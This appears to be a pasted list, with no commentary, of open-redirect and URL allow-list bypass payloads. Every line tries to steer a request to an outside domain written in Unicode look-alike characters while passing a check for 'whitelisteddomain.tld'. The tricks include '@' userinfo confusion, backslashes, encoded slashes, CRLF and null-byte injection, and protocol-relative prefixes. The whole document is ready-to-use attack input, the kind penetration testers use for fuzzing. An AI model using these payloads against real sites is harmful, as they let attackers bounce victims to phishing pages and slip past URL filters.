- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ%00。Pⓦ
- https://www.whitelisteddomain.tld/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- 〱Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- 〵Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ゝⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /〱Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /〵Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /ゝⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- <>//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
- https://:@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
- http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@www.whitelisteddomain.tld/
- http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@www.whitelisteddomain.tld/
- http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- http://www.whitelisteddomain.tld+&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@www.whitelisteddomain.tld/
- http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twww.whitelisteddomain.tld/
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@www.whitelisteddomain.tld/
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@www.whitelisteddomain.tld/
- //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- //XY>.7d8T\205pZM@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- //XY>.7d8T\205pZM@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- //www.whitelisteddomain.tld+&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@www.whitelisteddomain.tld/
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twww.whitelisteddomain.tld/
- //;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- http://;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- @Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%2f%2f.www.whitelisteddomain.tld/
- http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%5c%5c.www.whitelisteddomain.tld/
- http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%3F.www.whitelisteddomain.tld/
- http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%23.www.whitelisteddomain.tld/
- http://www.whitelisteddomain.tld:80%40Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- http://www.whitelisteddomain.tld%2eⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- /https:/%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- https:/%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- /http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /%2f%2fⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- //%2f%2fⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- /http:/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- http:/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- http://.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- .Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ///\;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- /////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- http://www.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\.www.whitelisteddomain.tld
- %01https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- www.whitelisteddomain.tld;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- https://www.whitelisteddomain.tld;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- http:%0a%0dⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- https://%0a%0dⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
- https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
Add Comment
Please, Sign In to add comment